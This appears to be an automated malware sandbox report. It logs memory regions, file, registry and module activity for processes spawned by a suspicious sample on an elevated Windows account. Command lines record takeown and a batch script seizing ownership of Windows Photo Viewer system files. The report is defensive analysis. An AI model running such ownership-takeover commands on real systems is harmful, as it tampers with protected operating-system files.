| Parent PID | 0xcf8 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6E0
0x
60C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x005d0000 | 0x00603fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffc1000 | 0x7ffc1000 | 0x7ffc1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #140: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #140 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:49, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6d0 |
| Parent PID | 0xf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
788
0x
5D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x0433ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x0435ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004340000 | 0x04340000 | 0x0434ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x04353fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004360000 | 0x04360000 | 0x04361fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04360000 | 0x04364fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004370000 | 0x04370000 | 0x04383fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004390000 | 0x04390000 | 0x043cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x0440ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004410000 | 0x04410000 | 0x04413fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004420000 | 0x04420000 | 0x04420fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004430000 | 0x04430000 | 0x04431fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0447ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004480000 | 0x04480000 | 0x044bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x044c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x044d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044e0000 | 0x044e0000 | 0x044effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044f0000 | 0x044f0000 | 0x0476ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x044f0000 | 0x045adfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x045b0000 | 0x045d9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004670000 | 0x04670000 | 0x0476ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x0485ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004860000 | 0x04860000 | 0x049e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049f0000 | 0x049f0000 | 0x04b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b80000 | 0x04b80000 | 0x05f7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05f80000 | 0x062b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecf0000 | 0x7ecf0000 | 0x7edeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edf0000 | 0x7edf0000 | 0x7ee12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee14000 | 0x7ee14000 | 0x7ee14fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee17000 | 0x7ee17000 | 0x7ee19fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1a000 | 0x7ee1a000 | 0x7ee1cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee1d000 | 0x7ee1d000 | 0x7ee1dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #141: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #141 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:47, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Self Terminated |
| Monitor Duration | 00:00:45 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6d4 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
454
0x
948
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005d0000 | 0x005d0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00613fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x00763fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00770fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00781fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00800000 | 0x008bdfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04d5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04d60000 | 0x05096fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e490000 | 0x7e490000 | 0x7e58ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e590000 | 0x7e590000 | 0x7e5b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e5b7000 | 0x7e5b7000 | 0x7e5b9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5ba000 | 0x7e5ba000 | 0x7e5bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5bd000 | 0x7e5bd000 | 0x7e5bdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5be000 | 0x7e5be000 | 0x7e5befff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 52, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
